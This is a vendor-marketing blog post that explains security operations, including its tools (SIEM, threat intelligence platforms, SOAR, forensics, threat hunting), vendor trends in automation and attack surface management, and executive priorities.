What is Security Operations (SecOps)? Defined, Explained, and Trends
Chief Technology Evangelist
February 8, 2022
What is Security Operations (SecOps)?
Security operations are the beating heart of an organization’s security activity. Security Operations can be performed in-house by a team of skilled security professionals and/or using a third-party Security Operations Center (SOC). Security Operations works as a centralized coordination unit based on the security principle of people, processes, and technology to manage cybersecurity threats and incidents. Security Operations depend on metrics gathered from across the corporate IT infrastructure reaching across disparate devices and data stores. These metrics are collated from event logs across this infrastructure using specialist tools. These tools detect, interpret, and help resolve a security event. We've teamed up with Arrow to break down what is security operations, the processes, and trends.
What are some of the responsibilities of Security Operations teams?
Some common responsibilities of the Security Operations team include:
Monitoring and responding to security incidents
Implementing and maintaining security controls and technologies
Conducting security assessments and vulnerability scans to remediate security vulnerabilities
Developing and implementing security policies and procedures
Ensuring compliance with security regulations and standards
Providing or overseeing security awareness training to the broader organization
Conducting forensic investigations to determine the root cause of security incidents
Staying up-to-date with the latest security threats and vulnerabilities
Responding to security-related inquiries and requests from other teams and departments
Why is Security Operations Important?
Understanding the complex and emerging threats that make up the cybersecurity landscape requires intelligence. MITRE runs a US federal government-funded cybersecurity initiative that tracks threats to help support government and non-government Security Operations. One look at the MITRE ATT&K framework shows how intricate, interconnected, and complex modern threats are. In 2021, Accenture recorded an increase in global cyber attacks of 125%; the volume and complexity of security threats require deep intelligence to defend an organization.
Threat intelligence helps organizations identify, manage, and respond to cyber threats by analyzing high volumes of information known as "threat indicators." The intelligence gathered using a Security Operations model is used to detect emerging or ongoing cyber threats. This analysis is done continuously, then used to harden the enterprise against the attack or close off vulnerabilities.
What are the technologies that support Security Operations?
The Security Operations team needs to have specialist technologies to support their intelligence gathering and analysis. Each of the following technologies is part of a suite of building blocks used to create a positive cybersecurity posture built on intelligence:
Security Information & Event Management (SIEM)
A SIEM is a next-generation event log management and analysis system; SIEM is used by Security Operations to monitor and analyze event logs in real-time, with the SIEM acting as a data orchestration system. These event logs are generated across an enterprise’s expanded IT infrastructure capturing data on access and login events, data from anti-malware and endpoint security tools, potential malware activity such as unusual data exfiltration events, and so on. The logs are collated and analyzed, and reports created by the SIEM, with any anomalies away from a baseline generating alerts. Modern SIEM systems also offer user and entity behavioral analytics (UEBA) analysis based on machine learning.
Threat Intelligence Platforms (TIP)
Threat intelligence is generated using information to help an organization identify, manage, and respond to security threats. There are potentially millions of these pieces of data or ‘threat indicators’ to analyze. Because of the vast amounts of threat indicator data, organizations use a Threat Intelligence Platform (TIP) specifically designed to collate and analyze these data to create a picture of an organization’s threat profile. A TIP streamlines the process of locating, collecting, aggregating, and analyzing these data. A TIP will reduce the noise of these millions of data points and reduce false positives. The output from a TIP can be used alongside a SIEM to improve the accuracy of the SIEM reports and alerts. Using the output from a TIP, a Security Operations team can make proactive and informed security decisions. A TIP is typically deployed as a cloud service (SaaS) but can also be hosted on-premise.
Security analytics is the practical application of data analysis for use in cybersecurity intelligence. The analysis is typically done using machine learning (ML) and more traditional algorithms to analyze both historical and real-time data. The analysis looks for anomalies that may signal a security event. The data analysis output from a security analytic software tool allows an organization to be more proactive in its threat detection and diagnosis. These security solutions can detect both insider and external security threats. Typical data sources include alerts and feeds from firewalls and endpoint security tools, network traffic data, and third-party security data feeds. Security analytics platforms are typically composed of several elements: behavioral analytics (detects anomalous user behavior and events); network analysis and visibility (NAV, analyzes network traffic); and security orchestration, automation, and response (SOAR; this may be provided through integration with a SIEM).
Incident response describes how a company manages a security incident such as a data or other type of security breach or any other type of cyber attacks. A security event can lead to massive disruption of business operations. This impacts productivity, affects business continuity, and can lead to lost reputation; a security incident can also place a company into non-compliance with data protection and privacy regulations. Incident response is usually carried out by a specialist team called a computer incident response team (CIRT). Incident response teams will use an incident response plan to direct activities to mitigate the attack and handle the situation post-attack. Incident response focuses on minimizing the impact of an attack, ensuring that any data leaks are contained and that processes are put in place to prevent the threat from continuing.
A SOAR platform is a suite of security tools that locates and gathers data from various sources, including a SIEM system, to automate the mundane tasks security analysts perform. Typically, a SOAR platform will be designed to allow for machine learning-based analysis and human interpretation; the latter helps define and prioritize any potential threat indicators.
Cybersecurity attacks often exploit vulnerabilities in software and systems. To close these security gaps, vendors release patches and updates that fix security flaws. Patch management is most effective when automated.
Digital Forensics & eDiscovery
Specialized eDiscovery solutions search through the large amounts of Electronically Stored Information (ESI) common in modern organizations. The reasons for using eDiscovery are wide-ranging and include legal purposes, regulatory compliance, and general cybersecurity-related digital forensics. An eDiscovery tool requires relevant data input before the software can index and process these data to identify duplicate and unusable files. eDiscovery tools then search through the files to review, annotate, and tag them.
Digital Forensics differs from eDiscovery in that the focus is on finding obfuscated or even deleted data. Digital Forensics is an often-lengthy task performed by highly-skilled security analysts who search through various devices and network shares to locate potential data of interest. Often, Digital Forensics requires manual techniques to extract these data.
Threat hunting describes the practice of searching for potential vulnerabilities and threats against an IT infrastructure, including the people that use it. Threat hunters are part of Security Operations and are highly skilled. They use experience, cyber know-how, and specialist tools to help them locate unusual behavior and anomalies across the expanded corporate network. Known Indicators of Compromise (IoC) or Indicators of Attack (IoA) are used as a baseline for Threat Hunting. Crowd-sourced attack data and frameworks such as MITRE ATT&CK are used to help in hunting threats. Machine learning-enabled tools help threat hunters sift through the copious amounts of data generated across the expanded network.
Security Operations Technology Trends and Disruptions
The discipline of Security Operations incorporates fast-emerging technologies to help fight against cyber threats. Some of the most critical areas on the rise in this space are:
Automation is a key emerging technology in cybersecurity and Security Operations. Automation removes the need for a human operator to evaluate the massive amounts of data needed to analyze potential security events. Automation helps security teams focus on important security issues by providing the analysis, detection, and triage needed to give the security team the bandwidth to respond appropriately and remediate issues. Within the discipline of security automation are several sub-categories of solutions and approaches:
Security Orchestration & Automation (SOAR)
SOAR is taking the security automation world by storm. This powerful solution uses intelligent technologies and processes such as machine learning to ease the management of security alerts. Disruptive SOAR platforms are usually integrated into the SecOPs (IT Security + IT Operations) process to reduce the ‘mean time of resolution’ of a security incident. Swimlane is making waves in the space by providing the first cloud-scale low code SOAR capability that integrates deeply into a SecOps process. Swimlane supports SecOpsHub that provides community support for incident response. Another contender disrupting SOAR is D3Security, which offers a comprehensive package that includes a MITRE ATT&CK kill chain discovery feature. D3Security also provides a package for MSPs to deliver SOAR-as-a-Service.
According to software vulnerability tracker CVE Details, 2021 saw the highest number of software flaws in its history. As unpatched vulnerabilities are like bees to honey for cybercriminals, patching the numerous security flaws is vital in maintaining a secure environment. Fortunately, patch management has gone from onerous to achievable using automation. In this space, Automox is fully cloud-native, reducing the operational overhead of patch management across multiple geographies. JetPatch is another disrupter in patch automation. JetPatch provides patch automation across Cloud, hybrid or, on-premise.
Keeping in compliance with regulations is complicated; regulations are often updated and can have a far-reaching impact on IT operations. Compliance automation is a vanguard in technology, helping an organization maintain security through monitoring and automating manual tasks needed to maintain compliance. Disruptors in this space include Vanta and Drata. Vanta provides a platform to automate security monitoring that maps a variety of regulations, including HIPAA and SOC 2. Similarly, Drata provides a fully-fledged automation platform that delivers compliance monitoring for regulations, including HIPAA and PCI-DSS.
Breach & Attack Simulation
This emerging area is a type of automated penetration testing; Breach and Attack Simulation tools provide the means to detect vulnerabilities in an organization’s cyber-defenses automatically. Interesting vendors in this space include AttackIQ, which uses the MITRE ATT&CK matrix, alongside internal expertise, to run advanced cyber-tests against a company’s critical assets. Another vendor of interest is Cymulate, which provides a lightweight agent to analyze attack scenarios based on the MITRE ATT&CK matrix.
Attack Surface Management
This process ensures that the entire real-estate of an IT infrastructure is under continuous discovery and monitoring, enabling assets classification to prioritize security controls. Types of attack surface management currently disrupting the discipline include:
Cyber Asset Attack Surface Management (CAASM)
Visibility is always an issue in dispersed IT infrastructures that may also contain legacy elements. CAASM tools use APIs to link existing data sources to locate resources and validate security controls. The space is disrupted by several vendors, including Axonius and JupiterOne. Axonius offers comprehensive integrations with over 400 applications and provides complete visibility of assets and automated policy validation. JupiterOne has over 150 integrations to provide visibility of cyber-assets. The company releases new integrations every two weeks.
External Attack Surface Management
External or digital attack surface management covers all the internet-facing assets that could be exploited during a cyber attack. The ability to manage the external surface is complicated by ShadowIT and asset exposure across the massive surface of the internet. In this space, Cycognito provides the first “Shadow Risk Elimination platform” that uses nation-state-level cyber reconnaissance techniques to locate hidden assets. Expanse is another disruptor in the space offering unparalleled visibility into internet-facing assets. Now known as Xpanse, the company was recently acquired by Palo Alto Networks.
Digital Risk Protection Services (DRPS)
DRPS reduces the risk of unwanted or malicious exposure of sensitive data, company brand, and other assets. Achieving this across an expansive attack surface is no small feat. However, disruptive vendors ZeroFox, and CybelAngel are doing just that. ZeroFox uses artificial intelligence (AI) to dismantle the kill chain, including dismantling malicious domains. CybelAngel provides comprehensive monitoring of assets across every layer of the web using machine learning algorithms.
Metrics offer actionable insights for many scenarios: security ratings are a type of quantitative measure based on metrics that provide a view of an organization's security posture. They are a useful guide to whether your company is doing well or not in terms of cybersecurity risk mitigation. BitSight and UpGuard offer leading-edge solutions in security rating services. BitSight is a pioneer of security ratings, applying an ‘outside-in model’ as used by credit reference agencies. UpGuard uses a set of proprietary algorithms to analyze millions of data points from commercial and open-source resources to evaluate cybersecurity risk quantitatively.
What are the CXO Priorities within Security Operations?
The cybersecurity threat landscape lies within the eye of a perfect storm: cybercriminals are emboldened by massive financial gains from the success of ransomware, with 37% of organizations suffering from a ransomware attack in 2021. The massive attack surface makes threat hunting complicated; vulnerabilities are proliferating, and Security Operation tools typically require skilled staff to optimize their use. This storm sets the priorities of the CXO as:
The skills gap in security is 65% below the required capacity, according to the (ISC)2 2021 Workforce Study.
Skills shortages in security must be a focus for the CXO, who should look to improve recruitment by reaching out to a more diverse talent pool. Also, look to train internal employees who show an interest in security.
Dealing with the complications afforded by security tool sprawl must be on the CXO watch list. A TrendMicro survey found that companies use around 29 monitoring solutions. This sprawl increases noise and unhappy security staff, overrun with false-positive alerts.
A CXO should look to manage this by using integrated tools for Security Operations or by outsourcing to a SOC.
A 2021 survey from the Enterprise Strategy Group (ESG) and Axonius, found that 79% of organizations reported a widening visibility gap across their cloud infrastructures. This was due to pandemic-related remote working, end-user device proliferation, and Internet of Things (IoT), the result being increased cybersecurity risk. CXOs should place a strong focus on asset visibility, using appropriate enforceable security policies based on mapped assets.
Detection & Response Time
According to IBM's 2020 Cost of a Data Breach Report, it takes an average of 200 days to detect a breach. In that time, sensitive data can be exfiltrated, emails accounts can be compromised, and malware can be installed.
A CXO must ensure that the security team builds strategies to reduce breach detection times by developing a proactive security posture. Technologies such as SOAR, SIEM, and automated patch management can help in this endeavor.
Without cloud computing, dealing with disasters like the pandemic would be much more challenging. However, cloud computing also brings challenges as it expands the potential attack surface. Not only must security teams secure the traditional infrastructure, but secure operations must extend into the cloud Infrastructure and the Software-as-a-Service (SaaS) environments.
CXOs can turn to next-generation tools to ensure that Security Operations can meet the security challenges of this expanded infrastructure. These tools use emerging technologies such as automation and AI/ML to deal with the massive amount of data generated across this surface.
Want to stay on top of security operations technologies? We Can Help
At Vation Ventures, we focus on innovations and trends in technologies on your behalf. We help offset the cost, effort, and time you spend identifying and comparing technologies to solve your organization's problems. Want to learn more? Get in touch today.